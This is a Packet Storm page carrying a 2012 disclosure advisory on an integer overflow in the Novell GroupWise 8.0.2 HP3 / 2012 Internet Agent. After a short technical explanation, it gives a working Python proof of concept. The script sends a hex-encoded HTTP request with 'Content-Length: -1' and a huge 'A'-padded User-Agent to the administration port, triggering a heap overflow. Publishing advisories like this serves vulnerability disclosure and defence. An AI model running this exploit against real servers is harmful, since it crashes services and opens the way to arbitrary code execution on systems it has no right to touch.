what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Novell Groupwise 8.0.2 HP3 / 2012 Integer Overflow

Novell Groupwise 8.0.2 HP3 / 2012 Integer Overflow
Posted Sep 17, 2012
Authored by Francis Provencher

Novell Groupwise versions 8.0.2 HP3 and 2012 suffers from an integer overflow vulnerability.

tags | exploit, overflow
SHA-256 | f82e2a8cfbd871bf746381353b9d597a48d059ad35b2d45116b4b230fc917e0f

Novell Groupwise 8.0.2 HP3 / 2012 Integer Overflow

Change Mirror Download
#####################################################################################

Application: Novell Groupwise

Platforms: Windows
Version: 8.0.2 HP3 and 2012

Secunia: SA50622

{PRL}: 2012-28

Author: Francis Provencher (Protek Research Lab's)

Website: http://www.protekresearchlab.com/

Twitter: @ProtekResearch


#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) The Code


#####################################################################################

===============
1) Introduction
===============

Novell, Inc. is a global software and services company based in Waltham, Massachusetts. The company specializes in

enterprise operating systems, such as SUSE Linux Enterprise and Novell NetWare; identity, security, and systems
management solutions; and collaboration solutions, such as Novell Groupwise and Novell Pulse. Novell was instrumental
in making the Utah Valley a focus for technology and software development. Novell technology contributed to the
emergence of local area networks, which displaced the dominant mainframe computing model and changed computing
worldwide. Today, a primary focus of the company is on developing open source software for enterprise clients.

(http://en.wikipedia.org/wiki/Novell)

#####################################################################################

============================
2) Report Timeline
============================

2012-02-03 Vulnerability reported to Secunia
2012-09-14 Publication of this advisory


#####################################################################################

============================
3) Technical details
============================
The vulnerability is caused due to an integer overflow error in GroupWise Internet Agent (gwia.exe)
when copying request data and can be exploited to cause a heap-based buffer overflow by e.g.
sending a specially crafted request with the "Content-Length" header value set to "-1" to the web-based
administration interface (TCP port 9850). Successful exploitation may allow execution of arbitrary code.


#####################################################################################

===========
4) The Code
===========

#!/usr/bin/python

import sys,os,socket

if len(sys.argv) < 3:
print "Usage: host,port"
sys.exit(0)

host=sys.argv[1]
port=int(sys.argv[2])

sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

sock.connect((host,port))

sock.send("\x47\x45\x54\x20\x2F\x20\x48\x54\x54\x50\x2F\x31\x2E\x30\x0D\x0A\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x4C\x65\x6E\x67\x74\x68\x3A\x20\x2D\x31\x0D\x0A\x45\x78\x70\x69\x72\x65\x73\x3A\x20\x4D\x6F\x6E\x2C\x20\x30\x32\x20\x4A\x75\x6E\x20\x31\x39\x38\x32\x20\x30\x30\x3A\x30\x30\x3A\x30\x30\x20\x47\x4D\x54\x0D\x0A\x46\x72\x6F\x6D\x3A\x20\x61\x61\x61\x61\x61\x40\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x2E\x63\x6F\x6D\x0D\x0A\x49\x66\x2D\x4D\x6F\x64\x69\x66\x69\x65\x64\x2D\x53\x69\x6E\x63\x65\x3A\x20\x4D\x6F\x6E\x2C\x20\x30\x32\x20\x4A\x75\x6E\x20\x31\x39\x38\x32\x20\x30\x30\x3A\x30\x30\x3A\x30\x30\x20\x47\x4D\x54\x0D\x0A\x4C\x61\x73\x74\x2D\x4D\x6F\x64\x69\x66\x69\x65\x64\x3A\x20\x4D\x6F\x6E\x2C\x20\x30\x32\x20\x4A\x75\x6E\x20\x31\x39\x38\x32\x20\x30\x30\x3A\x30\x30\x3A\x30\x30\x20\x47\x4D\x54\x0D\x0A\x52\x65\x66\x65\x72\x65\x72\x3A\x20\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x2E\x63\x6F\x6D\x2F\x0D\x0A\x55\x73\x65\x72\x2D\x41\x67\x65\x6E\x74\x3A\x20\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41

print "done!"

sock.close()

Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    30 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close